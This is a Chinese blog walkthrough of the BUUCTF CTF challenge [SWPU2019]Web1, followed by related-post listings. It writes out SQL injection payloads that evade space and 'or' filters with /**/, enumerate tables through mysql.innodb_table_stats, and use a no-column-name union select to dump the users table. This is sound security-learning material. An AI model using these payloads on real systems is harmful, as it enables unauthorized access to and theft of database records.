buuctf-[SWPU2019]Web1(小宇特详解)

最新推荐文章于 2024-03-30 08:53:32 发布
最新推荐文章于 2024-03-30 08:53:32 发布
阅读量1.5k 收藏 5
点赞数 1
分类专栏: buuctf 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xhy18634297976/article/details/123155608
版权

buuctf-[SWPU2019]Web1(小宇特详解)

1.先看题目

2.这里我怀疑是sql注入,尝试了万能密码和sqlmap都没有效果

3.这里发现了有一个注册登录的地方

这里自己注册一个,不要注册admin,不要问我怎么知道的。

这里进去之后是一个广告信息管理

这里使用1’ order by 1#

来测试一下

显示标题有敏感词汇

这里没有源码只能去手动的测试他过滤了啥

最终我发现了她过滤了or # --+和空格

这里想一下绕过的方法

空格可以用/**/来代替

–+注释符的话就用单引号闭合就ok

or被过滤了的话就不能使用order by,information_schema

这里使用一个新的注入方法

1.这里检查数据库列数

-1'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

回显是2,3

2.然后去爆数据库

1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

库名是web1

3.爆表名,这里不能使用or,所以这里使用的是新的payload

1'/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'

这里的表名是ads和users

4.去爆users的字段

1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'

小宇特详解
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
[SWPU2019]Web1
weixin_45577185的博客
09-12 484
1.二次注入 2.bypass information_schema 3.无列名注入 bypass information_schema 尝试使用单引号判断是否存在注入 报错说明存在二次注入 题目环境过滤了空格,我们使用/**/来进行绕过。过滤了or,因此我们无法使用order by 以及information_schema这个库。因为过滤了注释符,所以查询语句的最后我们要闭合单引号 本题在但是比赛中 bypass information_schema 是利用的 sys.schema_auto_incr
2016 SWPU CTF web1题目源码
10-31
2016 SWPU CTF web1题目源码
BUUCTF题目Misc部分wp(持续更新)
苦行僧的妖孽日常
11-05 6698
BUUCTF题目Misc部分wp(持续更新)
[SWPU2019]Web1(sql
最新发布
wikey 的博客
03-30 860
因为不能使用or,就不存在information_schema,但是可以使用替代的innodb数据库,当过滤了information_schema时可以用mysql.innodb_table_stats代替information_schema。最终payload:-1’union//select//1,(select//group_concat(b)//from//(select//1,2,3//as//b//union//select/爆表名,这里不能使用or,所以这里使用的是新的payload。
[SWPU2019]Web1 (bypass information_schema,无列名注入)
qq_52907838的博客
09-26 292
打开环境,是个登录框: 注册账号,登录后,有个广告发布,随便输入后查看详情后会回显: 一下子就会想到是xss,于是我试了一下,果然还真存在xss: 但是后来才知道没用,是个SQL题,注入点在标题那: 按照步骤来,发现or,#都被过滤,空格会被消除,空格简单,用/**/就能绕过,但order by和information_schema都不能用,那咋判断字段数,不会要用union select一个个试吧(那这个题可能要搞傻),其实还可以用group by: 1'/**/group..
buuctf [SWPU2019]Web1 记录
SopRomeo的博客
03-14 1324
注册进去发现可以发广告,看到这我马上试了试有没有xss漏洞 可以发现是存在的。emmmm,我用beef上传那个js代码不行。。可能是我太菜了我觉得这道题应该能用xss漏洞做出来。 百度了web 发现广告栏存在sql注入… 学到了,留言板也是放在数据库里的,可能是最近接触xss的缘故没想到吧…太菜了我。 我找到的writeup写的太简略了,我这个菜鸡就写的详细点吧… 在title进行常规sql判...
毕设&课设&项目&实训-SWPU数据库原理及应用大作业《西柚外卖订餐系统》基于Python+Flask+MySQL开发.zip
02-10
毕设&课设&项目&实训-本项目为SWPU数据库原理及应用大作业《西柚外卖订餐系统》,基于Python+Flask+MySQL开发 【项目资源】: 包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
SWPU大数据概论课程报告
01-31
仅作备份
精品-- FedCom为SWPU届本科毕业设计《基于社区检测的多任务聚类联邦学习》。本研究提出了一种多任务聚类联邦学.zip
02-05
精品-- FedCom为SWPU届本科毕业设计《基于社区检测的多任务聚类联邦学习》。本研究提出了一种多任务聚类联邦学
BUUCTF:[SWPU2019]Web1 sql注入 MariaDB注入--无列名注入-group_concat ---- /**/---group by ----- 3.9修改
Zero_Adam的博客
02-24 3512
目录:一、自己做:二、不足&&学到的:三、学习WP1.测试看看过滤了那些关键字,(这里要多看看,学学)2.使用无列名注入:这里稍停一下:3.下面学习无列名注入: 无列名注入详解:无列名注入详解 参考自:本题目的详解 写博客只是为了输出学习而已, 无他 一、自己做: 发现了 那个广告的地方可能有漏洞 二、不足&&学到的: 尝试了ssti。却忘记了尝试sql注入。。。 过滤了order的时候,可以用group by 来测试有多少行 单引号闭合,正常闭合会出错的话,可以,
BUUCTF:[ACTF新生赛2020]swp
末初的CSDN博客
07-23 3916
BUUCTF:[ACTF新生赛2020]swp
BUUCTF——[SWPU2019]Web1 sql无列名注入
m0_62107966的博客
03-19 285
在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息,但是没有存储列名。这里因为回显出来的位数是2,3,我直接查看的第二列,内容如下。数据库保存着mysql所有其他数据库的信息,包括了数据库名,表名,字段名等,无列名注入。适用条件information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库。其中 performance_
[SWPU2019]伟大的侦探
07-27
回答: \[SWPU2019\]伟大的侦探是一个BUUCTF比赛中的题目。根据引用\[1\]和引用\[2\]的内容,我们可以得知在解密过程中得到了一个密码"comEON_YOuAreSOSoS0great",而在解密过程中还发现了一个密码"wllm_is_the_best_team!"。根据引用\[3\]的内容,我们可以得知下载下来的文件是一个压缩包,但是打不开,经过一系列的分析后发现了一个二维码,扫描后显示"flag不在这"。综合这些信息,我们可以推断\[SWPU2019\]伟大的侦探这个题目可能涉及到密码解密和二维码的分析。 #### 引用[.reference_title] - *1* *3* [BUUCTF MISC刷题](https://blog.csdn.net/wow0524/article/details/122448957)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [BUUCTF msic 专题(59)[SWPU2019]伟大的侦探](https://blog.csdn.net/tt_npc/article/details/124389689)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小宇特详解

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值